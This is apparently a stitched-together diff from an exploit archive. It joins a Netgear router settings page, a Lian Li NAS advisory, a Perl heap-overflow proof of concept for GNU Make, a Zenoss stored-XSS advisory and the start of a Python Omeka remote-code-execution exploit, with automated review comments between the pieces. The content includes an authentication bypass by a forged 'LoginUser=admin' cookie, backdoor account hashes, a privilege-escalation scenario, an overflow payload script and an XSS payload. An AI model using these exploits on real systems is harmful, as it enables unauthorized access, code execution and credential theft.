</tr>
<tr>
<td colspan="2"><input type="radio" name="DNSAssign" value="1" onClick="setDNS()" onChange="setCfgChanged()"> Use These DNS Servers</td>
</tr>
<tr>
<td><img src="spacer.gif" width="20" height="12" border="0">Primary DNS</td>
<td align="right" class="num">
<input type="text" name="DAddr1" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="DAddr2" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="DAddr3" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="DAddr4" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()"></td>
</tr>
<tr>
<td><img src="spacer.gif" width="20" height="12" border="0"><a href="javascript:loadhelp('BAS_mpppoe','DNSaddress')" tabindex="-1">Secondary DNS</a></td>
<td align="right" class="num">
<input type="text" name="PDAddr1" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="PDAddr2" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="PDAddr3" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="PDAddr4" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()"></td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2"><a href="javascript:loadhelp('BAS_mpppoe','nat')" tabindex="-1"><b>NAT (Network Address Translation) </b></a></td>
</tr>
<tr>
<td> </td>
<td align="right">
<input type="radio" name="nat_enable" value="1" onChange="setCfgChanged()"> Enable
<input type="radio" name="nat_enable" value="0" onChange="setCfgChanged()"> Disable
<input type="radio" name="nat_enable" value="2" onChange="setCfgChanged()"> Bridge
</td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2" align="center"><div ID="pppoebuttons" onmouseover="loadhelp('BAS_mpppoe','buttons')">
<input type="SUBMIT" name="apply" value="Apply" onClick="return checkData()">
<input type="BUTTON" name="Cancel" value="Cancel" onClick="resetPvc();">
<input type="BUTTON" name="Test" value="Test" onClick="checkTest();">
</div></td></tr>
</table>
<INPUT name=gui_mode type=hidden value= "1">
<INPUT name=nowchoice type=hidden value= "0">
<INPUT name=pppoe_localip type=hidden value= "">
<INPUT name=wan_dns_sel type=hidden value= "">
<INPUT name=wan_dns1_pri type=hidden value= "">
<INPUT name=wan_dns1_sec type=hidden value= "">
<INPUT name=atm0_vpi type=hidden value= "8">
<INPUT name=atm0_vci type=hidden value= "48">
<INPUT name=atm0_multiplex type=hidden value= "llcencaps">
<INPUT name=atm0_encap type=hidden value= "LLC">
<INPUT name=atm1_vpi type=hidden value= "0">
<INPUT name=atm1_vci type=hidden value= "32">
<INPUT name=atm1_multiplex type=hidden value= "llcencaps">
<INPUT name=atm1_encap type=hidden value= "LLC">
<INPUT name=atm2_vpi type=hidden value= "0">
<INPUT name=atm2_vci type=hidden value= "33">
<INPUT name=atm2_multiplex type=hidden value= "llcencaps">
<INPUT name=atm2_encap type=hidden value= "LLC">
<INPUT name=atm3_vpi type=hidden value= "0">
<INPUT name=atm3_vci type=hidden value= "34">
<INPUT name=atm3_multiplex type=hidden value= "llcencaps">
<INPUT name=atm3_encap type=hidden value= "LLC">
<INPUT name=atm4_vpi type=hidden value= "0">
<INPUT name=atm4_vci type=hidden value= "35">
<INPUT name=atm4_multiplex type=hidden value= "llcencaps">
<INPUT name=atm4_encap type=hidden value= "LLC">
<INPUT name=atm5_vpi type=hidden value= "0">
<INPUT name=atm5_vci type=hidden value= "36">
<INPUT name=atm5_multiplex type=hidden value= "llcencaps">
<INPUT name=atm5_encap type=hidden value= "LLC">
<INPUT name=atm6_vpi type=hidden value= "0">
<INPUT name=atm6_vci type=hidden value= "37">
<INPUT name=atm6_multiplex type=hidden value= "llcencaps">
<INPUT name=atm6_encap type=hidden value= "LLC">
<INPUT name=atm7_vpi type=hidden value= "0">
<INPUT name=atm7_vci type=hidden value= "38">
<INPUT name=atm7_multiplex type=hidden value= "llcencaps">
<INPUT name=atm7_encap type=hidden value= "LLC">
<input type="hidden" name="cfgChanged" value="0">
<input type="hidden" name="testpressed" value="0">
<input type="hidden" name="runtest" value="no">
<INPUT name=wan0_dial type=hidden value= "1">
<INPUT name=wan1_dial type=hidden value= "0">
<INPUT name=wan2_dial type=hidden value= "0">
<INPUT name=wan3_dial type=hidden value= "0">
<INPUT name=wan4_dial type=hidden value= "0">
<INPUT name=wan5_dial type=hidden value= "0">
<INPUT name=wan6_dial type=hidden value= "0">
<INPUT name=wan7_dial type=hidden value= "0">
</form>
<p></p>
</body>
</html>
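Review bot: The advisory never states whether the Basic Settings page (`pppoe_m.cgi`, also reachable as `BAS_mpppoe.htm`) can be fetched without authenticating to the router, and that single fact decides whether this is an unauthenticated credential leak or an administrator reading the ISP secret back out of an admin-only page; the step `Navigate to the Basic Settings page` should say under which session it works, and the description should name the disclosed data as the PPPoE/ISP login rather than just "the password". The mechanism is visible in the page and worth spelling out: the field is `<input type="password" name="pppoe_passwd" ... value="">`, so the masking is purely client-side, while the stored secret is emitted verbatim in the inline script as `all_pppoe_passwd[0] = "MyPassword";` and copied into the field on load by `cf.pppoe_passwd.value = all_pppoe_passwd[index];` — so anyone who can obtain the HTML (logs or a proxy on what is presumably a plain-HTTP management session, or a script-injection chain in the device UI) gets the cleartext, which makes this a disclosure-in-the-served-page issue rather than the "storing it in plaintext" storage issue the description currently claims. The same arrays also expose the PPPoE username (`user@012ISP`) and the configured DNS servers, so the disclosed set is larger than the password alone. The `<META name="description" content="DGN2200v2BEZEQ">` line suggests an ISP-branded v2 hardware revision; the title should carry that revision, since the `1.0.0.29_1.7.29_HotS` firmware string on its own may not identify which DGN2200 units are affected. A vendor-side fix would be to never emit the stored secret into the page — populate the field with a fixed placeholder and only update `pppoe_passwd` when the submitted value differs from it.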


@ -0,0 +1,327 @@
# Exploit Title: Lian Li NAS Multiple vulnerabilities
# Date: 21/07/2014
# Exploit Author: pws
# Vendor Homepage: http://www.lian-li.com/en/dt_portfolio_category/nas/
# Firmware Link: https://www.dropbox.com/s/imvkndl8m5yj7qp/G5S604121826700.tar.gz
# Tested on: Latest version
# CVE : None yet
1. Hardcoded cookie to access the admin section
File: /javascript/storlib.js
function get_cookie()
{
var allcookies = document.cookie;
var pos = allcookies.indexOf("LoginUser=admin");
if (pos == -1)
location = "/index.html";
}
2. Authentication bypass
Create such cookie: 'LoginUser=admin' (document.cookie='LoginUser=admin').
Then, access the URL directly to get admin features.
Eg.
http://192.168.1.1/cgi/telnet/telnet.cgi # enable/disable the Telnet server
http://192.168.1.1/cgi/user/user.cgi # manage users (change passwords, add user, ...)
Here are all the cgi's accessible (firmware: G5S604121826700) :
cgi/lan/lan.cgi
cgi/lan/lan_nasHandler.cgi
cgi/lan/lan_routerHandler.cgi
cgi/information/information.cgi
cgi/return/return.cgi
cgi/account/account.cgi
cgi/account/accountHandler.cgi
cgi/lang/lang.cgi
cgi/lang/langHandler.cgi
cgi/backup/clear.cgi
cgi/backup/fixed.cgi
cgi/backup/ipaddress.cgi
cgi/backup/listing.cgi
cgi/backup/s.cgi
cgi/backup/schedule.cgi
cgi/backup/source.cgi
cgi/backup/dd_schedule.cgi
cgi/backup/decide.cgi
cgi/backup/ipaddress1.cgi
cgi/backup/s1.cgi
cgi/backup/source1.cgi
cgi/backup/ipaddress2.cgi
cgi/backup/s2.cgi
cgi/backup/source2.cgi
cgi/backup/ipaddress3.cgi
cgi/backup/s3.cgi
cgi/backup/source3.cgi
cgi/backup/ipaddress5.cgi
cgi/backup/s5.cgi
cgi/backup/source5.cgi
cgi/backup/l.cgi
cgi/backup/listing1.cgi
cgi/backup/listing2.cgi
cgi/backup/listing3.cgi
cgi/backup/listing5.cgi
cgi/backup/email.cgi
cgi/backup/email1.cgi
cgi/backup/fixed1.cgi
cgi/backup/schedule1.cgi
cgi/backup/email2.cgi
cgi/backup/fixed2.cgi
cgi/backup/schedule2.cgi
cgi/backup/email3.cgi
cgi/backup/fixed3.cgi
cgi/backup/schedule3.cgi
cgi/backup/dd_schedule1.cgi
cgi/backup/dd_schedule2.cgi
cgi/backup/dd_schedule3.cgi
cgi/backup/dd_schedule5.cgi
cgi/backup/email5.cgi
cgi/backup/fixed5.cgi
cgi/backup/schedule5.cgi
cgi/backup/fixed6.cgi
cgi/backup/ipaddress6.cgi
cgi/backup/listing6.cgi
cgi/backup/s6.cgi
cgi/backup/email6.cgi
cgi/backup/schedule6.cgi
cgi/backup/source6.cgi
cgi/backup/dd_schedule6.cgi
cgi/backup/fixed4.cgi
cgi/backup/ipaddress4.cgi
cgi/backup/listing4.cgi
cgi/backup/s4.cgi
cgi/backup/email4.cgi
cgi/backup/schedule4.cgi
cgi/backup/source4.cgi
cgi/backup/dd_schedule4.cgi
cgi/backup/emessage.cgi
cgi/backup/emessage_fail.cgi
cgi/group/group.cgi
cgi/group/groupHandler.cgi
cgi/group/groupDeleteHandler.cgi
cgi/group/groupMembers.cgi
cgi/group/groupMembersHandler.cgi
cgi/user/user.cgi
cgi/user/userHandler.cgi
cgi/user/userDeleteHandler.cgi
cgi/user/userMembership.cgi
cgi/user/userMembershipHandler.cgi
cgi/time/time.cgi
cgi/time/timeHandler.cgi
cgi/power/power.cgi
cgi/power/powerHandler.cgi
cgi/factoryReset/factoryReset.cgi
cgi/factoryReset/factoryResetHandler.cgi
cgi/restoreConfig/restoreConfig.cgi
cgi/restoreConfig/restoreConfigHandler.cgi
cgi/saveConfig/saveConfig.cgi
cgi/saveConfig/saveConfigHandler.cgi
cgi/diskUsage/diskUsage.cgi
cgi/diskUsage/diskUsageuser.cgi
cgi/diskUsage/diskUsageHandler.cgi
cgi/diskUsage/diskUsageuserHandler.cgi
cgi/diskUtility/diskUtility.cgi
cgi/diskUtility/diskUtilityHandler.cgi
cgi/diskUtility/healthReport.cgi
cgi/dhcpserver/dhcpserver.cgi
cgi/dhcpserver/dhcpserverHandler.cgi
cgi/dhcpserver/dhcplease.cgi
cgi/dhcpserver/dhcpleaseHandler.cgi
cgi/dhcpserver/dhcpstatic.cgi
cgi/dhcpserver/dhcpstaticHandler.cgi
cgi/dhcpserver/staticipDeleteHandler.cgi
cgi/errorAlert/errorAlert.cgi
cgi/errorAlert/errorAlertHandler.cgi
cgi/share/share.cgi
cgi/share/shareHandler.cgi
cgi/share/shareDeleteHandler.cgi
cgi/share/share_nonLinux.cgi
cgi/share/share_nonLinuxHandler.cgi
cgi/share/share_Linux.cgi
cgi/share/share_LinuxHandler.cgi
cgi/fileServer/fileServer.cgi
cgi/fileServer/fileServerHandler.cgi
cgi/log_system/log_system.cgi
cgi/log_system/log_systemHandler.cgi
cgi/log_admin/log_admin.cgi
cgi/log_admin/log_adminHandler.cgi
cgi/log_dhcp/log_dhcp.cgi
cgi/log_dhcp/log_dhcpHandler.cgi
cgi/log_ftp/log_ftp.cgi
cgi/log_ftp/log_ftpHandler.cgi
cgi/log_samba/log_samba.cgi
cgi/log_samba/log_sambaHandler.cgi
cgi/printer/printer.cgi
cgi/printer/printerHandler.cgi
cgi/upgrade2/upgrade.cgi
cgi/upgrade2/upgradeHandler.cgi
cgi/wizard/wizard.cgi
cgi/wizard/language.cgi
cgi/wizard/languageHandler.cgi
cgi/wizard/password.cgi
cgi/wizard/passwordHandler.cgi
cgi/wizard/hostname.cgi
cgi/wizard/hostnameHandler.cgi
cgi/wizard/tcpip.cgi
cgi/wizard/tcpipHandler.cgi
cgi/wizard/time.cgi
cgi/wizard/timeHandler.cgi
cgi/wizard/confirm.cgi
cgi/wizard/confirmHandler.cgi
cgi/wizard/addUser.cgi
cgi/wizard/user.cgi
cgi/wizard/userHandler.cgi
cgi/wizard/userMembership.cgi
cgi/wizard/userMembershipHandler.cgi
cgi/wizard/userSharePermission.cgi
cgi/wizard/userSharePermissionHandler.cgi
cgi/wizard/addGroup.cgi
cgi/wizard/group.cgi
cgi/wizard/groupHandler.cgi
cgi/wizard/groupMembers.cgi
cgi/wizard/groupMembersHandler.cgi
cgi/wizard/groupSharePermission.cgi
cgi/wizard/groupSharePermissionHandler.cgi
cgi/wizard/addShare.cgi
cgi/wizard/share.cgi
cgi/wizard/shareHandler.cgi
cgi/wizard/sharePermission.cgi
cgi/wizard/sharePermissionHandler.cgi
cgi/wizard/nfsPermission.cgi
cgi/wizard/nfsPermissionHandler.cgi
cgi/wizard/button.cgi
cgi/telnet/telnet.cgi
cgi/telnet/telnetHandler.cgi
cgi/bonjour/bonjour.cgi
cgi/bonjour/bonjourHandler.cgi
cgi/raid/raid.cgi
cgi/raid/raidHandler.cgi
cgi/swupdate/swupdate.cgi
cgi/swupdate/swupdateHandler.cgi
cgi/swupdate/installHandler.cgi
cgi/swupdate/swlist.cgi
cgi/swupdate/swlistHandler.cgi
All forms on those cgi pages can be used to perform CSRF attacks (to target internal network for example).
3. Backdoored accounts
Some users are not referenced in the management page but are present in the system.
Moreover, the robustness of such passwords is really poor (password = "123456"):
mysql:$1$$RmyPVMlhpXjJj8iv4w.Ul.:6000:6000:Linux User,,,:/home/mysql:/bin/sh
daemon:$1$$RmyPVMlhpXjJj8iv4w.Ul.:7000:7000:Linux User,,,:/home/daemon:/bin/sh
4. Privilege escalation "scenario"
Enable Telnet server (if disabled)
Connect to it using one of the backdoored accounts and retrieve /etc/passwd file.
It contains passwords for all accounts.
5. Certificate used by the FTP server stored in the firmware
cacert.pem
subject=/C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
-----BEGIN X509 CERTIFICATE-----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-----END X509 CERTIFICATE-----
server-cert.pem
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=TW, ST=Taipei, O=Storm, OU=software, CN=aaron/emailAddress=aaron@storlinksemi.com
Validity
Not Before: Jan 3 00:46:50 2007 GMT
Not After : Jan 3 00:46:50 2008 GMT
Subject: C=TW, ST=Taipei, L=Hsinchu, O=Storm, OU=software, CN=aaron/emailAddress=aaron@storlinksemi.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:c4:1d:89:dc:9b:45:6c:96:e2:ad:e6:98:13:25:
64:b4:54:f6:e4:97:74:d5:9f:15:1e:1d:45:a1:75:
45:fc:3b:2b:9c:dd:e6:0d:34:4b:d7:6c:8d:d0:32:
5f:39:25:ab:53:81:de:84:17:cf:27:0a:c2:26:82:
9f:09:3f:a8:7e:8c:31:c3:fe:43:75:fe:1f:53:8e:
74:0e:31:d2:55:71:51:1b:7a:01:e3:57:4f:f7:d6:
9f:1d:39:19:42:3c:a1:bd:08:d1:99:69:fc:1c:34:
6e:0f:fb:a7:36:f5:77:bf:95:c8:1d:50:30:25:59:
23:39:d3:27:5a:06:0a:05:6d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
61:19:1F:04:38:83:83:E0:CD:6A:8C:CA:F9:9C:6E:D3:7F:C5:55:C3
X509v3 Authority Key Identifier:
keyid:F6:E9:49:A1:24:01:C1:0A:4C:7F:6A:E7:58:B8:95:BC:AF:95:B4:F7
DirName:/C=TW/ST=Taipei/O=Storm/OU=software/CN=aaron/emailAddress=aaron@storlinksemi.com
serial:00
Signature Algorithm: sha1WithRSAEncryption
5b:b7:dc:28:58:5e:53:c5:d7:88:be:71:21:43:b5:db:a1:d7:
fc:de:38:1d:38:e7:b3:a4:a5:64:92:1b:67:1b:c8:3e:0f:a9:
16:77:0c:0b:bf:e9:d2:b5:70:cd:05:71:df:1a:db:2a:c8:56:
5d:91:1c:ef:2b:16:b3:f0:55:89:ba:35:e4:ae:07:6c:4a:c5:
d0:0d:e3:1b:1d:5e:fd:01:b2:52:0e:fe:05:08:ed:40:26:e6:
b0:2b:24:2f:0d:42:11:f0:d9:b4:6d:db:ce:d1:b1:65:77:62:
7a:06:8b:09:c7:33:f3:43:13:a7:33:47:af:5c:6a:39:4e:8f:
64:5c
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
server-key.pem
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
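Review bot: The header's "Tested on: Latest version" on line 824 does not identify the firmware build, although line 841 names it as G5S604121826700; putting it in the header, e.g. `# Tested on: firmware G5S604121826700`, makes the affected version unambiguous. The get_cookie() quoted in section 1 runs only in the browser, so the CGI handlers listed afterwards evidently perform no authentication of their own; the advisory would be clearer if it said so, since the remediation is server-side session validation in each handler rather than a change to storlib.js. Section 5 embeds the FTP server's private key; because it ships inside the firmware image it is presumably identical on every unit, and saying so would make the impact (and the need for per-device key generation) explicit.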

182
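--- a/platforms/linux/dos/34164.pl
+++ b/platforms/linux/dos/34164.pl
@@ -0,0 +1,182 @@
+=for comment
+# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64
+# Date: [14.07.14]
+# Exploit Author: HyP
+# Vendor Homepage: http://www.gnu.org/software/make/
+# Software Link: http://ftp.gnu.org/gnu/make/
+# Version: Make 3.81
+# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch)
+# CVE : none
+*******************************************************************************************
+Special Thanks:
+kmkz
+Zadyree
+Sec0d Team
+*******************************************************************************************
+*******************************************************************************************
+32bits
+./checksec.sh --file make
+RELRO STACK CANARY NX PIE RPATH
+RUNPATH FILE
+No RELRO No canary found NX enabled No PIE No RPATH
+No RUNPATH make
+gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`
+Program received signal SIGSEGV, Segmentation fault.
+[----------------------------------registers-----------------------------------]
+...
+EAX: 0xdeadbeef
+EBX: 0x807b971 --> 0x6f2e ('.o')
+ECX: 0x0
+EDX: 0x1
+ESI: 0xdeadbeef
+EDI: 0x0
+EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0
+ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
+EIP: 0x80548b2 (mov eax,DWORD PTR [eax])
+EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
+overflow)
+[-------------------------------------code-------------------------------------]
+0x80548aa: je 0x80548b8
+0x80548ac: lea esi,[esi+eiz*1+0x0]
+0x80548b0: mov esi,eax
+=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing
+0x80548b4: test eax,eax
+0x80548b6: jne 0x80548b0
+0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1
+0x80548bf: mov DWORD PTR [ebp-0x10ac],edx
+[------------------------------------stack-------------------------------------]
+0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
+0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')
+0008| 0xbfffa318 --> 0x2
+0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")
+0016| 0xbfffa320 --> 0x0
+0020| 0xbfffa324 --> 0x0
+0024| 0xbfffa328 --> 0x0
+0028| 0xbfffa32c --> 0x0
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+0x080548b2 in ?? ()
+Overflow code:
+...
+80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>
+80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
+80548b0: 89 c6 mov %eax,%esi
+80548b2: 8b 00 mov (%eax),%eax
+80548b4: 85 c0 test %eax,%eax
+80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>
+...
+gdb-peda$ x/x $eax
+0x807ff68: 0x00000000
+peda vmmap
+Start End Perm Name
+0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make
+0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make
+0x08070000 0x08092000 rw-p [heap] // heap overflow !!
+*******************************************************************************************
+*******************************************************************************************
+64bits
+Overflow Code :
+40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b>
+40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
+40cc60: 48 89 c3 mov rbx,rax
+40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow
+Program received signal SIGSEGV, Segmentation fault.
+[----------------------------------registers-----------------------------------]
+RAX: 0xdeadbeefdeadbeef
+RBX: 0xdeadbeefdeadbeef
+RCX: 0x4242424242424242 ('BBBBBBBB')
+RDX: 0x0
+RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)
+RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')
+RBP: 0x7fffffffb930 --> 0x1
+RSP: 0x7fffffff95f0 --> 0x0
+RIP: 0x40cc63 (mov rax,QWORD PTR [rax])
+R8 : 0x4242424242424242 ('BBBBBBBB')
+R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])
+R10: 0x4242424242424242 ('BBBBBBBB')
+R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708
+R12: 0x1
+R13: 0x0
+R14: 0x6397a0 --> 0x6f2e25 ('%.o')
+R15: 0x0
+EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
+overflow)
+[-------------------------------------code-------------------------------------]
+0x40cc59: je 0x40cc6b
+0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]
+0x40cc60: mov rbx,rax
+=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing
+0x40cc66: test rax,rax
+0x40cc69: jne 0x40cc60
+0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1
+0x40cc72: lea rdi,[rbp-0x40]
+[------------------------------------stack-------------------------------------]
+0000| 0x7fffffff95f0 --> 0x0
+0008| 0x7fffffff95f8 --> 0x0
+0016| 0x7fffffff9600 --> 0x0
+0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b -->
+0x5f7266006362696c ('libc')
+0032| 0x7fffffff9610 --> 0xffffffdf
+0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541
+--> 0x5f726600656b616d ('make')
+0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 -->
+0x64667b --> 0x5f7266006362696c ('libc')
+0056| 0x7fffffff9628 --> 0x0
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+0x000000000040cc63 in ?? ()
+*******************************************************************************************
+*******************************************************************************************
+Proof of Concept - Source code
+*******************************************************************************************
+*******************************************************************************************
+=cut
+#!/usr/bin/perl
+use 5.010;
+use strict;
+use warnings;
+say "Please set ulimit value to 1000 before (ulimit -c 1000) ";
+sleep 0.5;
+my $buff = "A"x 4096 ;
+my $addr = "\xef\xbe\xad\xde";
+my $make = "./make";
+my $gdb = "gdb --core core";
+my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`);
+my $exec= qx($make $PAYLOAD);
+say " Reading Core file GDB ";
+sleep 0.5;
+system ($gdb);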
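Review bot: `sleep 0.5;` on lines 1226 and 1234 does not pause at all, because Perl's built-in sleep takes whole seconds and truncates the argument to 0; add `use Time::HiRes qw(sleep);` beside the other use lines if a half-second pause is intended. The payload on line 1231 is built by spawning a second perl through backticks to interpolate two variables that are already in scope, which also routes the raw `\xef\xbe\xad\xde` bytes through a shell; `my $PAYLOAD = $buff . $addr;` yields the same string without the subprocess. The script also uses 4096 bytes of filler with one copy of the address, whereas the gdb session in the POD header used 4000 + 96 bytes and four copies, so the text should say which layout produced the crash it shows.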


@ -0,0 +1,92 @@
# Exploit Title: Stored XSS vulnerability in Zenoss core open source
monitoring system
# Date: 12/05/2014
# Exploit author: Dolev Farhi dolev(at)openflare.org
# Vendor homepage: http://zenoss.com
# Software Link: http://www.zenoss.com
# Version: Core 4.2.5-2108 64bit
# Tested on: Kali Linux
# Vendor alerted: 12/05/2014
# CVE-2014-3738
Software details:
==================
Zenoss (Zenoss Core) is a free and open-source application, server, and
network management platform based on the Zope application server.
Released under the GNU General Public License (GPL) version 2, Zenoss
Core provides a web interface that
allows system administrators to monitor availability,
inventory/configuration, performance, and events.
Vulnerability details: Stored XSS Vulnerability
========================
A persistent XSS vulnerability was found in Zenoss core, by creating a
malicious host with the Title <script>alert("Xss")</script> any user
browsing
to the relevant manufacturers page will get a client-side script
executed immediately.
Proof of Concept:
1. Create a device with with the Title
<script>alert("XSS")</script>
2. Navigate to the Infrastructure -> Manufacturers
page.
3. pick the name of the manufacturer of the device, e.g.
Intel
4. select the type of the hardware the device is
assigned to, e.g. GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz
5. the XSS Executes.
<tr class="even">
<td class="tablevalues"><a
href='/zport/dmd/Devices/Server/Linux/devices/localhost/devicedetail'><script>alert("Dolev")</script></a></td>
<td class="tablevalues">GenuineIntel_ Intel(R) Core(TM)
i7-2640M CPU _ 2.80GHz</td>
</tr>
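Review bot: The proof-of-concept steps on lines 1266-1267 use a Title of `<script>alert("XSS")</script>`, but the HTML excerpt on line 1277 shows `<script>alert("Dolev")</script>`; the two should agree so a reader can tell the captured output came from the described steps. The excerpt also has no caption saying which page it was taken from — presumably the hardware-type page reached in step 4 — and a lead line such as `Rendered source of the manufacturer's hardware-type page:` would fix that. For remediation the advisory could state the sink explicitly: the device title is emitted unencoded as the anchor text of the devicedetail link, so HTML-escaping the title when that page is rendered is the fix.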

293
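--- a/platforms/php/remote/34160.txt
+++ b/platforms/php/remote/34160.txt
@@ -0,0 +1,293 @@
+#!/usr/bin/env python
+#
+#
+# Omeka 2.2.1 Remote Code Execution Exploit
+#
+#
+# Vendor: Omeka Team (CHNM GMU)
+# Product web page: http://www.omeka.org
+# Affected version: 2.2.1 and 2.2
+#
+# Summary: Omeka is a free, flexible, and open source web-publishing
+# platform for the display of library, museum, archives, and scholarly
+# collections and exhibitions. Its 'five-minute setup' makes launching
+# an online exhibition as easy as launching a blog.
+#
+# Desc: Omeka suffers from an authenticated arbitrary PHP code execution.
+# The vulnerability is caused due to the improper verification of
+# uploaded files in '/admin/items/add' script thru the 'file[0]' POST
+# parameter. This can be exploited to execute arbitrary PHP code by
+# uploading a malicious PHP script file that will be stored in
+# '/files/original' directory after successfully disabling the file
+# validation option (or adding something like 'application/x-php' into the
+# allowed MIME types list) and bypassing the rewrite rule in the '.htaccess'
+# file with '.php5' extension.
+#
+# .htaccess fix by vendor:
+# -------------------------------------------------------
+# Line 29: -RewriteRule !\.php$ - [C]
+# Line 29: +RewriteRule !\.(php[0-9]?|phtml|phps)$ - [C]
+# -------------------------------------------------------
+#
+# - Role permission for disabling validation and uploading files: Super
+# - Role permission for uploading files: Super, Admin
+#
+# Ref: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php
+#
+# Tested on: Kali Linux 3.7-trunk-686-pae
+# Apache/2.2.22 (Debian)
+# PHP 5.4.4-13(apache2handler)
+# MySQL 5.5.28
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#
+# Zero Science Lab - http://www.zeroscience.mk
+# Macedonian Information Security Research And Development Laboratory
+#
+#
+# Advisory ID: ZSL-2014-5194
+# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5194.php
+#
+#
+# 16.07.2014
+#
+#
+version = '2.0.0.251'
+import itertools, mimetools, mimetypes
+import cookielib, urllib, urllib2, sys
+import logging, os, time, datetime, re
+from colorama import Fore, Back, Style, init
+from cStringIO import StringIO
+from urllib2 import URLError
+init()
+if os.name == 'posix': os.system('clear')
+if os.name == 'nt': os.system('cls')
+piton = os.path.basename(sys.argv[0])
+def bannerche():
+print '''
+@---------------------------------------------------------------@
+| |
+| Omeka 2.2.1 Remote Code Execution Exploit |
+| |
+| |
+| ID: ZSL-2014-5194 |
+| |
+| Copyleft (c) 2014, Zero Science Lab |
+| |
+@---------------------------------------------------------------@
+'''
+if len(sys.argv) < 3:
+print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
+print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk omeka\n'
+sys.exit()
+bannerche()
+print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
+host = sys.argv[1]
+path = sys.argv[2]
+cj = cookielib.CookieJar()
+opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+try:
+opener.open('http://'+host+'/'+path+'/admin/users/login')
+except urllib2.HTTPError, errorzio:
+if errorzio.code == 404:
+print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
+print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
+print
+sys.exit()
+except URLError, errorziocvaj:
+if errorziocvaj.reason:
+print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
+print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
+print
+sys.exit()
+print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
+print '\x20\x20[*] Login please.'
+username = raw_input('\x20\x20[*] Enter username: ')
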